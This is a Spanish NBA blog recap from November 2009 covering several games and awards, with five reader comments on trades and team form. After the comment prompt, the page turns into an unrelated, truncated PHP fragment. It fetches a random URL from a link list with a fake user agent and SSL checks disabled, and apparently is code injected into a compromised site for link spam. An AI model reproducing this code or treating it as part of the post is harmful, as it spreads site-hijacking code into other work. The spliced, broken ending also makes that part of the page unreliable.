La Crónica (13/11/2009)

14 de November de 2009 por TheDeerHunter

Tropezón combinado de los dos líderes solidariamente. Los Celtics se vieron dominados en su propia casa por los Hawks en un partido redondo de los visitantes. Joe Johnson y Jamal Crawford se complementaron para perforar de forma constante la dura defensa de los verdes mientras los visitantes se mostraban superiores en el resto de facetas del juego. Reivindicación velada de los halcones. Mientras, los Lakers cayeron humillados en Denver en un mal partido de Kobe agravado, como sucede en demasiadas ocasiones, por la completa inoperancia de los suplentes. Sólo JR Smith, saliendo también del banco, anotó más que todos ellos juntos.

Los perseguidores, en cambio, hicieron sus deberes. Los Blazers se hicieron una ensalada de Okafor agarrando 60 rebotes en New Orleans, 20 de ellos ofensivos. Los Hornets son un desastre completo, con o sin Byron Scott, y encima se les lesiona Paul que, al menos, descansará y reordenará ideas durante un par de semanitas. Roy sigue sufriendo ofensivamente en la ala, Blake hace el cuadro de pseudo-dos abierto y los Fernandez, Webster u Outlaw se frustran desconcertados. Eso sí, el equipo sigue ganando. Que les dure.

Los Magic, dieron cuenta de uno de los peores equipos de la historia. Los Nets le harán una visita mañana a Wade y se pondrán con casi total seguridad con  un 0-10. Ahora deben de señalar en rojo el día 21, cuando les visiten los Knicks. Si no ganan ese partido la racha de derrotas se puede convertir en infinita. Los de D’Antoni alcanzaron anoche su peor inicio de la historia contra los Warriors, que no es que sean los Bulls de Jordan.

Los Mavs tampoco tuvieron que sudar demasiado para doblegar unos Wolves asolados, pero echarán de menos a Josh Howard que vuelve a la lista de lesionados de forma indefinida. Las alarmas empiezan a sonar con fuerza con respecto a este chico.

Los Raptors hicieron valer su superioridad con los Clippers y los Jazz con los Sixers, ambos a domicilio. Debemos destacar el ruinoso estado de forma de Brand y la vuelta de tuerca de Sloan para suplir la baja de Deron. Maynor y Matthews de backcourt titular haciéndolo francamente bien. Kirilenko otra vez de 6º, a ver cómo le sienta.

Por último, los sorprendentes Kings ganaron en casa a los sorprendentes Rockets. Otra vez se pagó el pecado de no tener verdaderos pívots. Thompson y Hawes les castigaron el cuerpo por dentro y Udrih y Tyreke por fuera. Con todo, los Rockets dieron la cara en todo momento, como hacen siempre, por otro lado.

PREMIOS TJNBA:

MVP: Aunque DH12 destrozó a los Nets, nos quedaremos con Carlos Boozer que hizo 24 puntos, 12 rebotes, 4 asistencias ante unos Sixers que, se supone, defienden bastante bien… y se comió vivo a “Mr. 20-10”, de paso.

El Rookie: Fue una gran noche para los rookies. Destacaremos lo fundamentales que fueron Maynor y Matthews en la victoria de los Jazz y, de entre todos, la impresionante actuación de Tyreke Evans, con 20 puntos, 6 rebotes, 4 asistencias, 1 robo y 1 tapón. Completísimo. Y esto no es flor de un día.

La sorpresa: Ya les hemos nombrado. Maynor y Matthews, o las 4 cuatro victorias seguidas de los Kings encaramándose a plazas de playoffs. Lo que os parezca.

La decepción: Ayer leí por ahí la simpática chanza de que “Mr 20-10” se ha convertido en “Mr. 10-5”, ayer ni eso y Brand cogió 2 rebotes dejando a Boozer humillarle sin piedad.

El mayor esfuerzo en vano: Un Rocket. Lo de mayor esfuerzo se presupone, como el valor, en este equipo. Ariza se marcó un partidazo de 28-5-5, pero no fue suficiente para llevarse la victoria del antaño temido ARCO Arena.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Tremendo curro de fin de semana Deer, eres el ídolo de la afición.

    Maynor es muy buen jugador, sería perfecto para el jugar los 10 minutos que le deje Deron este año y el que viene podria ser una muy buena pieza de traspaso para Utah.

      Citar

  2. Love Denise dice:
    #2

    hello,
    el partido de hornets vs blazers fue realmente malo, creo que lo mejor para los blazers sería buscar un traspaso en el que estén de por medio outlaw, rudy, webster, o batum , pienso que hay demasiados tios para la posición de 2 y de 3, jugando pocos minutos, y eso al final perjudica a todos. Para mí, no estaría mal traspasar a webster por algun paquete que acabe contrato y se quede en el banco sin jugar (por ejemplo, morrison) y al menos liberar salario para la renovacion de roy (creo que acaba contrato)

    Partidazos de Evans y Udrih,
    deer hunter, yo no creo que los nets sean de lo peor de la historia, son malos, llevan 0-9, pero tienen mucha gente lesionada (harris, courtney lee, yianlian, battie, dooling), para mi los grizzlies, knicks y timberwolves son peores

      Citar

  3. TheDeerHunter dice:
    #3

    en realidad no podría decir que son el peor equipo de la historia pero, objetivamente a estas alturas son como mínimo tan malos como el más malo. 0-9

      Citar

  4. Óscar dice:
    #4

    @ Love Denise: Roy y Aldridge ya están renovados, por un pastizal además. Yo no creo que a Pritchard le dé por hacer ningún intercambio durante la temporada, no lo suele hacer si no es del tipo Diogu-Ruffin intrascendente de febrero del año pasado, por motivos simplemente contractuales.

    Yo veo como una ventaja contar con muchos grandes jugadores en determinados puestos, sobre todo si la plantilla está bien configurada, como es el caso de Portland. La competencia se traduce en competitividad, en rendimiento. La distribución de minutos es cosa del “coach”. Además, la temporada es larga y puede haber lesiones u otros problemas. Cualquier equipo estaría encantado de contar con jugadores como Rudy, Batum, Outlaw, Webster o incluso Cunningham para jugar de “small forward”, o con el titular ahora mismo…Roy.

    Buena noticia para los Blazers : jugando poco brillante, gana sus partidos, a veces con autoridad. Es un equipo cada vez más sólido, sobre todo en defensa y en rebote, donde los números son excelentes. Y eso para un equipo tan joven es muy importante, casi diría que sorprendente. Y el balace ya es de 7-3…

      Citar

  5. Love Denise dice:
    #5

    ok deerhunter,
    gracias oscar, no sabia lo de roy, es cierto que cualquier equipo querría tener muchos jugadores en un puesto como los blazers, es más, yo siempre opino que es muy importante tener una buena profundidad de banquillo en un equipo por lesiones, bajones de forma, etc…, pero yo creo, que al ser jugadores tan jovenes (Rudy, batum, outlaw, webster, el rookie cunningham, bayless), quedrán jugar muchos minutos para intentar demostar su potencial y ganarse buenos contartos en el futuro, entonces si el coach no sabe parar esta situación, se podrían producir piques y egosimos entre ellos, que pueden perjudicar al equipo y a ellos mismos, cortandole la progresión a algunos, ya sé que son hipotesis mías, pero podría pasar. Es cierto que siempre es buena la competencia, pero si ésta es extrema, no. Yo traspasaría alguno de éstos (preferiblemente Webster), por algún 4, pero claro, esto no será tan fácil como nos parece.

    Saludos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>